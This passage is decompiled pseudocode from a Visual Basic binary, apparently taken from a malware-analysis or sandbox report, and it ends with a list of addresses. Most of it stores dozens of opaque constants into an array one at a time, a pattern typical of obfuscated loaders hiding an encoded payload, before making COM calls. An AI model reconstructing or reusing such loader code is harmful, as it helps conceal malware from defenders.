					_t1403 = _v164;
					 *((intOrPtr*)(_v64 + _t1403 * 4)) = 0x53aad9;
					_v164 = 0x23;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v332 = _t1403;
					} else {
						_v332 = _v332 & 0x00000000;
					}
					_t1404 = _v164;
					 *((intOrPtr*)(_v64 + _t1404 * 4)) = 0x89c1a8;
					_v164 = 0x24;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v336 = _t1404;
					} else {
						_v336 = _v336 & 0x00000000;
					}
					_t1405 = _v164;
					 *((intOrPtr*)(_v64 + _t1405 * 4)) = 0x21fc89;
					_v164 = 0x25;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v340 = _t1405;
					} else {
						_v340 = _v340 & 0x00000000;
					}
					_t1406 = _v164;
					 *((intOrPtr*)(_v64 + _t1406 * 4)) = 0x3a3984;
					_v164 = 0x26;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v344 = _t1406;
					} else {
						_v344 = _v344 & 0x00000000;
					}
					_t1407 = _v164;
					 *((intOrPtr*)(_v64 + _t1407 * 4)) = 0x52d515;
					_v164 = 0x27;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v348 = _t1407;
					} else {
						_v348 = _v348 & 0x00000000;
					}
					_t1408 = _v164;
					 *((intOrPtr*)(_v64 + _t1408 * 4)) = 0x561d4a;
					_v164 = 0x28;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v352 = _t1408;
					} else {
						_v352 = _v352 & 0x00000000;
					}
					_t1409 = _v164;
					 *((intOrPtr*)(_v64 + _t1409 * 4)) = 0x6f072a;
					_v164 = 0x29;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v356 = _t1409;
					} else {
						_v356 = _v356 & 0x00000000;
					}
					_t1410 = _v164;
					 *((intOrPtr*)(_v64 + _t1410 * 4)) = 0x5f161b;
					_v164 = 0x2a;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v360 = _t1410;
					} else {
						_v360 = _v360 & 0x00000000;
					}
					_t1411 = _v164;
					 *((intOrPtr*)(_v64 + _t1411 * 4)) = 0x1a9878;
					_v164 = 0x2b;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v364 = _t1411;
					} else {
						_v364 = _v364 & 0x00000000;
					}
					_t1412 = _v164;
					 *((intOrPtr*)(_v64 + _t1412 * 4)) = 0x7e1cbb;
					_v164 = 0x2c;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v368 = _t1412;
					} else {
						_v368 = _v368 & 0x00000000;
					}
					_t1413 = _v164;
					 *((intOrPtr*)(_v64 + _t1413 * 4)) = 0x88d89a;
					_v164 = 0x2d;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v372 = _t1413;
					} else {
						_v372 = _v372 & 0x00000000;
					}
					_t1414 = _v164;
					 *((intOrPtr*)(_v64 + _t1414 * 4)) = 0x1a844b;
					_v164 = 0x2e;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v376 = _t1414;
					} else {
						_v376 = _v376 & 0x00000000;
					}
					_t1415 = _v164;
					 *((intOrPtr*)(_v64 + _t1415 * 4)) = 0x66a72b;
					_v164 = 0x2f;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v380 = _t1415;
					} else {
						_v380 = _v380 & 0x00000000;
					}
					_t1416 = _v164;
					 *((intOrPtr*)(_v64 + _t1416 * 4)) = 0x2e9160;
					_v164 = 0x30;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v384 = _t1416;
					} else {
						_v384 = _v384 & 0x00000000;
					}
					_t1417 = _v164;
					 *((intOrPtr*)(_v64 + _t1417 * 4)) = 0x6541c0;
					_v164 = 0x31;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v388 = _t1417;
					} else {
						_v388 = _v388 & 0x00000000;
					}
					_t1418 = _v164;
					 *((intOrPtr*)(_v64 + _t1418 * 4)) = 0x1cfaed;
					_v164 = 0x32;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v392 = _t1418;
					} else {
						_v392 = _v392 & 0x00000000;
					}
					_t1419 = _v164;
					 *((intOrPtr*)(_v64 + _t1419 * 4)) = 0x1e8560;
					_v164 = 0x33;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v396 = _t1419;
					} else {
						_v396 = _v396 & 0x00000000;
					}
					_t1420 = _v164;
					 *((intOrPtr*)(_v64 + _t1420 * 4)) = 0x4f88ca;
					_v164 = 0x34;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v400 = _t1420;
					} else {
						_v400 = _v400 & 0x00000000;
					}
					_t1421 = _v164;
					 *((intOrPtr*)(_v64 + _t1421 * 4)) = 0x25a97d;
					_v164 = 0x35;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v404 = _t1421;
					} else {
						_v404 = _v404 & 0x00000000;
					}
					_t1422 = _v164;
					 *((intOrPtr*)(_v64 + _t1422 * 4)) = 0xada9c;
					_v164 = 0x36;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v408 = _t1422;
					} else {
						_v408 = _v408 & 0x00000000;
					}
					_t1423 = _v164;
					 *((intOrPtr*)(_v64 + _t1423 * 4)) = 0x3b516f;
					_v164 = 0x37;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v412 = _t1423;
					} else {
						_v412 = _v412 & 0x00000000;
					}
					_t1424 = _v164;
					 *((intOrPtr*)(_v64 + _t1424 * 4)) = 0x683851;
					_v164 = 0x38;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v416 = _t1424;
					} else {
						_v416 = _v416 & 0x00000000;
					}
					_t1425 = _v164;
					 *((intOrPtr*)(_v64 + _t1425 * 4)) = 0x4cb199;
					_v164 = 0x39;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v420 = _t1425;
					} else {
						_v420 = _v420 & 0x00000000;
					}
					_t1426 = _v164;
					 *((intOrPtr*)(_v64 + _t1426 * 4)) = 0xd006;
					_v164 = 0x3a;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v424 = _t1426;
					} else {
						_v424 = _v424 & 0x00000000;
					}
					_t1427 = _v164;
					 *((intOrPtr*)(_v64 + _t1427 * 4)) = 0x4d458b;
					_v164 = 0x3b;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v428 = _t1427;
					} else {
						_v428 = _v428 & 0x00000000;
					}
					_t1428 = _v164;
					 *((intOrPtr*)(_v64 + _t1428 * 4)) = 0x793404;
					_v164 = 0x3c;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v432 = _t1428;
					} else {
						_v432 = _v432 & 0x00000000;
					}
					_t1429 = _v164;
					 *((intOrPtr*)(_v64 + _t1429 * 4)) = 0x7a33fb;
					_v164 = 0x3d;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v436 = _t1429;
					} else {
						_v436 = _v436 & 0x00000000;
					}
					_t1430 = _v164;
					 *((intOrPtr*)(_v64 + _t1430 * 4)) = 0x153a37;
					_v164 = 0x3e;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v440 = _t1430;
					} else {
						_v440 = _v440 & 0x00000000;
					}
					_t1431 = _v164;
					 *((intOrPtr*)(_v64 + _t1431 * 4)) = 0x80d8fe;
					_v164 = 0x3f;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v444 = _t1431;
					} else {
						_v444 = _v444 & 0x00000000;
					}
					_t1432 = _v164;
					 *((intOrPtr*)(_v64 + _t1432 * 4)) = 0x4a5566;
					_v164 = 0x40;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v448 = _t1432;
					} else {
						_v448 = _v448 & 0x00000000;
					}
					_t1433 = _v164;
					 *((intOrPtr*)(_v64 + _t1433 * 4)) = 0x6ee5f4;
					_v164 = 0x41;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v452 = _t1433;
					} else {
						_v452 = _v452 & 0x00000000;
					}
					_t1434 = _v164;
					 *((intOrPtr*)(_v64 + _t1434 * 4)) = 0x853a44;
					_v164 = 0x42;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v456 = _t1434;
					} else {
						_v456 = _v456 & 0x00000000;
					}
					_t1435 = _v164;
					 *((intOrPtr*)(_v64 + _t1435 * 4)) = 0x4e8bf;
					_v164 = 0x43;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v460 = _t1435;
					} else {
						_v460 = _v460 & 0x00000000;
					}
					_t1436 = _v164;
					 *((intOrPtr*)(_v64 + _t1436 * 4)) = 0x76f3f6;
					_v164 = 0x44;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v464 = _t1436;
					} else {
						_v464 = _v464 & 0x00000000;
					}
					_t1437 = _v164;
					 *((intOrPtr*)(_v64 + _t1437 * 4)) = 0x1fa814;
					_v164 = 0x45;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v468 = _t1437;
					} else {
						_v468 = _v468 & 0x00000000;
					}
					_t1438 = _v164;
					 *((intOrPtr*)(_v64 + _t1438 * 4)) = 0x681b3e;
					_v164 = 0x46;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v472 = _t1438;
					} else {
						_v472 = _v472 & 0x00000000;
					}
					_t1439 = _v164;
					 *((intOrPtr*)(_v64 + _t1439 * 4)) = 0x672b51;
					_v164 = 0x47;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v476 = _t1439;
					} else {
						_v476 = _v476 & 0x00000000;
					}
					_t1440 = _v164;
					 *((intOrPtr*)(_v64 + _t1440 * 4)) = 0x647953;
					_v164 = 0x48;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v480 = _t1440;
					} else {
						_v480 = _v480 & 0x00000000;
					}
					_t1441 = _v164;
					 *((intOrPtr*)(_v64 + _t1441 * 4)) = 0x747f58;
					_v164 = 0x49;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v484 = _t1441;
					} else {
						_v484 = _v484 & 0x00000000;
					}
					_t1442 = _v164;
					 *((intOrPtr*)(_v64 + _t1442 * 4)) = 0x465cf6;
					_v164 = 0x4a;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v488 = _t1442;
					} else {
						_v488 = _v488 & 0x00000000;
					}
					_t1443 = _v164;
					 *((intOrPtr*)(_v64 + _t1443 * 4)) = 0x7db5b2;
					_v164 = 0x4b;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v492 = _t1443;
					} else {
						_v492 = _v492 & 0x00000000;
					}
					_t1444 = _v164;
					 *((intOrPtr*)(_v64 + _t1444 * 4)) = 0x1c9824;
					_v164 = 0x4c;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v496 = _t1444;
					} else {
						_v496 = _v496 & 0x00000000;
					}
					_t1445 = _v164;
					 *((intOrPtr*)(_v64 + _t1445 * 4)) = 0x68959d;
					_v164 = 0x4d;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v500 = _t1445;
					} else {
						_v500 = _v500 & 0x00000000;
					}
					_t1446 = _v164;
					 *((intOrPtr*)(_v64 + _t1446 * 4)) = 0x8871d5;
					_v164 = 0x4e;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v504 = _t1446;
					} else {
						_v504 = _v504 & 0x00000000;
					}
					_t1447 = _v164;
					 *((intOrPtr*)(_v64 + _t1447 * 4)) = 0x8195f;
					_v164 = 0x4f;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v508 = _t1447;
					} else {
						_v508 = _v508 & 0x00000000;
					}
					_t1448 = _v164;
					 *((intOrPtr*)(_v64 + _t1448 * 4)) = 0x248715;
					_v164 = 0x50;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v512 = _t1448;
					} else {
						_v512 = _v512 & 0x00000000;
					}
					_t1449 = _v164;
					 *((intOrPtr*)(_v64 + _t1449 * 4)) = 0x332def;
					_v164 = 0x51;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v516 = _t1449;
					} else {
						_v516 = _v516 & 0x00000000;
					}
					_t1450 = _v164;
					 *((intOrPtr*)(_v64 + _t1450 * 4)) = 0x7d1bc;
					_v164 = 0x52;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v520 = _t1450;
					} else {
						_v520 = _v520 & 0x00000000;
					}
					_t1451 = _v164;
					 *((intOrPtr*)(_v64 + _t1451 * 4)) = 0x3adde4;
					_v164 = 0x53;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v524 = _t1451;
					} else {
						_v524 = _v524 & 0x00000000;
					}
					_t1452 = _v164;
					 *((intOrPtr*)(_v64 + _t1452 * 4)) = 0x63e869;
					_v164 = 0x54;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v528 = _t1452;
					} else {
						_v528 = _v528 & 0x00000000;
					}
					_t1453 = _v164;
					 *((intOrPtr*)(_v64 + _t1453 * 4)) = 0x484bde;
					_v164 = 0x55;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v532 = _t1453;
					} else {
						_v532 = _v532 & 0x00000000;
					}
					_t1454 = _v164;
					 *((intOrPtr*)(_v64 + _t1454 * 4)) = 0x1fac7f;
					_v164 = 0x56;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v536 = _t1454;
					} else {
						_v536 = _v536 & 0x00000000;
					}
					_t1455 = _v164;
					 *((intOrPtr*)(_v64 + _t1455 * 4)) = 0x22ad7b;
					_v164 = 0x57;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v540 = _t1455;
					} else {
						_v540 = _v540 & 0x00000000;
					}
					_t1456 = _v164;
					 *((intOrPtr*)(_v64 + _t1456 * 4)) = 0x40af11;
					_v164 = 0x58;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v544 = _t1456;
					} else {
						_v544 = _v544 & 0x00000000;
					}
					_t1457 = _v164;
					 *((intOrPtr*)(_v64 + _t1457 * 4)) = 0x7bafe8;
					_v164 = 0x59;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v548 = _t1457;
					} else {
						_v548 = _v548 & 0x00000000;
					}
					_t1458 = _v164;
					 *((intOrPtr*)(_v64 + _t1458 * 4)) = 0x4aad65;
					_v164 = 0x5a;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v552 = _t1458;
					} else {
						_v552 = _v552 & 0x00000000;
					}
					_t1459 = _v164;
					 *((intOrPtr*)(_v64 + _t1459 * 4)) = 0x231e02;
					_v164 = 0x5b;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v556 = _t1459;
					} else {
						_v556 = _v556 & 0x00000000;
					}
					_t1460 = _v164;
					 *((intOrPtr*)(_v64 + _t1460 * 4)) = 0x79559d;
					_v164 = 0x5c;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v560 = _t1460;
					} else {
						_v560 = _v560 & 0x00000000;
					}
					_t1461 = _v164;
					 *((intOrPtr*)(_v64 + _t1461 * 4)) = 0x58d175;
					_v164 = 0x5d;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v564 = _t1461;
					} else {
						_v564 = _v564 & 0x00000000;
					}
					_t1462 = _v164;
					 *((intOrPtr*)(_v64 + _t1462 * 4)) = 0x5306c1;
					_v164 = 0x5e;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v568 = _t1462;
					} else {
						_v568 = _v568 & 0x00000000;
					}
					_t1463 = _v164;
					 *((intOrPtr*)(_v64 + _t1463 * 4)) = 0x3a8477;
					_v164 = 0x5f;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v572 = _t1463;
					} else {
						_v572 = _v572 & 0x00000000;
					}
					_t1464 = _v164;
					 *((intOrPtr*)(_v64 + _t1464 * 4)) = 0x4d73f5;
					_v164 = 0x60;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v576 = _t1464;
					} else {
						_v576 = _v576 & 0x00000000;
					}
					_t1465 = _v164;
					 *((intOrPtr*)(_v64 + _t1465 * 4)) = 0x26821a;
					_v164 = 0x61;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v580 = _t1465;
					} else {
						_v580 = _v580 & 0x00000000;
					}
					_t1466 = _v164;
					 *((intOrPtr*)(_v64 + _t1466 * 4)) = 0x7f8194;
					_v164 = 0x62;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v584 = _t1466;
					} else {
						_v584 = _v584 & 0x00000000;
					}
					_t1467 = _v164;
					 *((intOrPtr*)(_v64 + _t1467 * 4)) = 0x41a49;
					_v164 = 0x63;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v588 = _t1467;
					} else {
						_v588 = _v588 & 0x00000000;
					}
					_t1468 = _v164;
					 *((intOrPtr*)(_v64 + _t1468 * 4)) = 0x25f4ad;
					_v164 = 0x64;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v592 = _t1468;
					} else {
						_v592 = _v592 & 0x00000000;
					}
					_t1469 = _v164;
					 *((intOrPtr*)(_v64 + _t1469 * 4)) = 0x70e937;
					_v164 = 0x65;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v596 = _t1469;
					} else {
						_v596 = _v596 & 0x00000000;
					}
					_t1470 = _v164;
					 *((intOrPtr*)(_v64 + _t1470 * 4)) = 0x46e583;
					_v164 = 0x66;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v600 = _t1470;
					} else {
						_v600 = _v600 & 0x00000000;
					}
					_t1471 = _v164;
					 *((intOrPtr*)(_v64 + _t1471 * 4)) = 0x78747e;
					_v164 = 0x67;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v604 = _t1471;
					} else {
						_v604 = _v604 & 0x00000000;
					}
					_t1472 = _v164;
					 *((intOrPtr*)(_v64 + _t1472 * 4)) = 0x14fd5a;
					_v164 = 0x68;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v608 = _t1472;
					} else {
						_v608 = _v608 & 0x00000000;
					}
					_t1473 = _v164;
					 *((intOrPtr*)(_v64 + _t1473 * 4)) = 0x19d7dd;
					_v164 = 0x69;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v612 = _t1473;
					} else {
						_v612 = _v612 & 0x00000000;
					}
					_t1474 = _v164;
					 *((intOrPtr*)(_v64 + _t1474 * 4)) = 0x5daf5c;
					_v164 = 0x6a;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v616 = _t1474;
					} else {
						_v616 = _v616 & 0x00000000;
					}
					_t1475 = _v164;
					 *((intOrPtr*)(_v64 + _t1475 * 4)) = 0x730560;
					_v164 = 0x6b;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v620 = _t1475;
					} else {
						_v620 = _v620 & 0x00000000;
					}
					_t1476 = _v164;
					 *((intOrPtr*)(_v64 + _t1476 * 4)) = 0x1428c2;
					_v164 = 0x6c;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v624 = _t1476;
					} else {
						_v624 = _v624 & 0x00000000;
					}
					_t1477 = _v164;
					 *((intOrPtr*)(_v64 + _t1477 * 4)) = 0x72108b;
					_v164 = 0x6d;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v628 = _t1477;
					} else {
						_v628 = _v628 & 0x00000000;
					}
					_t1478 = _v164;
					 *((intOrPtr*)(_v64 + _t1478 * 4)) = 0x12266b;
					_v164 = 0x6e;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v632 = _t1478;
					} else {
						_v632 = _v632 & 0x00000000;
					}
					_t1479 = _v164;
					 *((intOrPtr*)(_v64 + _t1479 * 4)) = 0x533a7d;
					_v164 = 0x6f;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v636 = _t1479;
					} else {
						_v636 = _v636 & 0x00000000;
					}
					_t1480 = _v164;
					 *((intOrPtr*)(_v64 + _t1480 * 4)) = 0x65161e;
					_v164 = 0x70;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v640 = _t1480;
					} else {
						_v640 = _v640 & 0x00000000;
					}
					_t1481 = _v164;
					 *((intOrPtr*)(_v64 + _t1481 * 4)) = 0x564bb1;
					_v164 = 0x71;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v644 = _t1481;
					} else {
						_v644 = _v644 & 0x00000000;
					}
					_t1482 = _v164;
					 *((intOrPtr*)(_v64 + _t1482 * 4)) = 0x28115f;
					_v164 = 0x72;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v648 = _t1482;
					} else {
						_v648 = _v648 & 0x00000000;
					}
					_t1483 = _v164;
					 *((intOrPtr*)(_v64 + _t1483 * 4)) = 0x62a53b;
					_v164 = 0x73;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v652 = _t1483;
					} else {
						_v652 = _v652 & 0x00000000;
					}
					_t1484 = _v164;
					 *((intOrPtr*)(_v64 + _t1484 * 4)) = 0x78509e;
					_v164 = 0x74;
					__eflags = _v164 - 0x75;
					if(_v164 >= 0x75) {
						L00401454();
						_v656 = _t1484;
					} else {
						_v656 = _v656 & 0x00000000;
					}
					 *((intOrPtr*)(_v64 + _v164 * 4)) = 0x3d54e;
					_v96 = 1;
					_v104 = 2;
					_push(0);
					_push( &_v104);
					L00401448();
					L0040144E();
					L0040147E();
					__eflags =  *0x41d614;
					if( *0x41d614 != 0) {
						_v660 = 0x41d614;
					} else {
						_push(0x41d614);
						_push(0x402f94);
						L00401442();
						_v660 = 0x41d614;
					}
					_v164 =  *_v660;
					_t1492 =  *((intOrPtr*)( *_v164 + 0x4c))(_v164,  &_v88);
					asm("fclex");
					_v168 = _t1492;
					__eflags = _v168;
					if(_v168 >= 0) {
						_t1138 =  &_v664;
						 *_t1138 = _v664 & 0x00000000;
						__eflags =  *_t1138;
					} else {
						_push(0x4c);
						_push(0x402f84);
						_push(_v164);
						_push(_v168);
						L0040149C();
						_v664 = _t1492;
					}
					_v172 = _v88;
					_t1496 =  *((intOrPtr*)( *_v172 + 0x28))(_v172);
					asm("fclex");
					_v176 = _t1496;
					__eflags = _v176;
					if(_v176 >= 0) {
						_t1150 =  &_v668;
						 *_t1150 = _v668 & 0x00000000;
						__eflags =  *_t1150;
					} else {
						_push(0x28);
						_push(0x402fa4);
						_push(_v172);
						_push(_v176);
						L0040149C();
						_v668 = _t1496;
					}
					L00401478();
					__eflags =  *0x41d614;
					if( *0x41d614 != 0) {
						_v672 = 0x41d614;
					} else {
						_push(0x41d614);
						_push(0x402f94);
						L00401442();
						_v672 = 0x41d614;
					}
					_v164 =  *_v672;
					_t1502 =  *((intOrPtr*)( *_v164 + 0x1c))(_v164,  &_v88);
					asm("fclex");
					_v168 = _t1502;
					__eflags = _v168;
					if(_v168 >= 0) {
						_t1166 =  &_v676;
						 *_t1166 = _v676 & 0x00000000;
						__eflags =  *_t1166;
					} else {
						_push(0x1c);
						_push(0x402f84);
						_push(_v164);
						_push(_v168);
						L0040149C();
						_v676 = _t1502;
					}
					_v172 = _v88;
					_t1323 =  *((intOrPtr*)( *_v172 + 0x50))(_v172);
					asm("fclex");
					_v176 = _t1323;
					__eflags = _v176;
					if(_v176 >= 0) {
						_t1178 =  &_v680;
						 *_t1178 = _v680 & 0x00000000;
						__eflags =  *_t1178;
					} else {
						_push(0x50);
						_push(0x402fb4);
						_push(_v172);
						_push(_v176);
						L0040149C();
						_v680 = _t1323;
					}
					L00401478();
				}
				_push(2);
				_push(0x402fc8);
				L00401436();
				L0040144E();
				_push(_t1323);
				_push(0x402fd4);
				L0040143C();
				asm("sbb eax, eax");
				_v164 =  ~( ~( ~_t1323));
				L00401430();
				__eflags = _v164;
				if(_v164 != 0) {
					__eflags =  *0x41d614;
					if( *0x41d614 != 0) {
						_v684 = 0x41d614;
					} else {
						_push(0x41d614);
						_push(0x402f94);
						L00401442();
						_v684 = 0x41d614;
					}
					_v164 =  *_v684;
					_t1347 =  *((intOrPtr*)( *_v164 + 0x14))(_v164,  &_v88);
					asm("fclex");
					_v168 = _t1347;
					__eflags = _v168;
					if(_v168 >= 0) {
						_t1198 =  &_v688;
						 *_t1198 = _v688 & 0x00000000;
						__eflags =  *_t1198;
					} else {
						_push(0x14);
						_push(0x402f84);
						_push(_v164);
						_push(_v168);
						L0040149C();
						_v688 = _t1347;
					}
					_v172 = _v88;
					_t1352 =  *((intOrPtr*)( *_v172 + 0xb8))(_v172,  &_v156);
					asm("fclex");
					_v176 = _t1352;
					__eflags = _v176;
					if(_v176 >= 0) {
						_t1211 =  &_v692;
						 *_t1211 = _v692 & 0x00000000;
						__eflags =  *_t1211;
					} else {
						_push(0xb8);
						_push(0x402fd8);
						_push(_v172);
						_push(_v176);
						L0040149C();
						_v692 = _t1352;
					}
					_v48 = _v156;
					L00401478();
					__eflags =  *0x41d614;
					if( *0x41d614 != 0) {
						_v696 = 0x41d614;
					} else {
						_push(0x41d614);
						_push(0x402f94);
						L00401442();
						_v696 = 0x41d614;
					}
					_v164 =  *_v696;
					_t1359 =  *((intOrPtr*)( *_v164 + 0x14))(_v164,  &_v88);
					asm("fclex");
					_v168 = _t1359;
					__eflags = _v168;
					if(_v168 >= 0) {
						_t1229 =  &_v700;
						 *_t1229 = _v700 & 0x00000000;
						__eflags =  *_t1229;
					} else {
						_push(0x14);
						_push(0x402f84);
						_push(_v164);
						_push(_v168);
						L0040149C();
						_v700 = _t1359;
					}
					_v172 = _v88;
					_t1364 =  *((intOrPtr*)( *_v172 + 0xb8))(_v172,  &_v156);
					asm("fclex");
					_v176 = _t1364;
					__eflags = _v176;
					if(_v176 >= 0) {
						_t1242 =  &_v704;
						 *_t1242 = _v704 & 0x00000000;
						__eflags =  *_t1242;
					} else {
						_push(0xb8);
						_push(0x402fd8);
						_push(_v172);
						_push(_v176);
						L0040149C();
						_v704 = _t1364;
					}
					_v44 = _v156;
					L00401478();
					L0040142A();
					L0040144E();
					_v708 =  *0x401128 *  *0x401120;
					_v200 = _v708;
					_t1368 =  *((intOrPtr*)( *_v0 + 0x84))(_v0,  &_v52, 1, 0, 0);
					asm("fclex");
					_v164 = _t1368;
					__eflags = _v164;
					if(_v164 >= 0) {
						_t1258 =  &_v712;
						 *_t1258 = _v712 & 0x00000000;
						__eflags =  *_t1258;
					} else {
						_push(0x84);
						_push(0x402df0);
						_push(_v0);
						_push(_v164);
						L0040149C();
						_v712 = _t1368;
					}
				}
				__eflags =  *0x41d614;
				if( *0x41d614 != 0) {
					_v716 = 0x41d614;
				} else {
					_push(0x41d614);
					_push(0x402f94);
					L00401442();
					_v716 = 0x41d614;
				}
				_v164 =  *_v716;
				_t1333 =  *((intOrPtr*)( *_v164 + 0x14))(_v164,  &_v88);
				asm("fclex");
				_v168 = _t1333;
				__eflags = _v168;
				if(_v168 >= 0) {
					_t1273 =  &_v720;
					 *_t1273 = _v720 & 0x00000000;
					__eflags =  *_t1273;
				} else {
					_push(0x14);
					_push(0x402f84);
					_push(_v164);
					_push(_v168);
					L0040149C();
					_v720 = _t1333;
				}
				_v172 = _v88;
				_t1338 =  *((intOrPtr*)( *_v172 + 0x140))(_v172,  &_v156);
				asm("fclex");
				_v176 = _t1338;
				__eflags = _v176;
				if(_v176 >= 0) {
					_t1286 =  &_v724;
					 *_t1286 = _v724 & 0x00000000;
					__eflags =  *_t1286;
				} else {
					_push(0x140);
					_push(0x402fd8);
					_push(_v172);
					_push(_v176);
					L0040149C();
					_v724 = _t1338;
				}
				_v40 = _v156;
				L00401478();
				_v32 =  *0x401118;
				asm("wait");
				_push(0x41b699);
				L00401430();
				L00401430();
				_v160 =  &_v76;
				_t1341 =  &_v160;
				_push(_t1341);
				_push(0);
				L00401424();
				return _t1341;
				goto L424;
			}

0x00402b34
0x00402b34
0x00402b34
0x00402b34
0x00402b34
0x00419515
0x00419517
0x00419526
0x00419530
0x00419538
0x0041953b
0x00419548
0x00419551
0x0041955c
0x00419567
0x0041956d
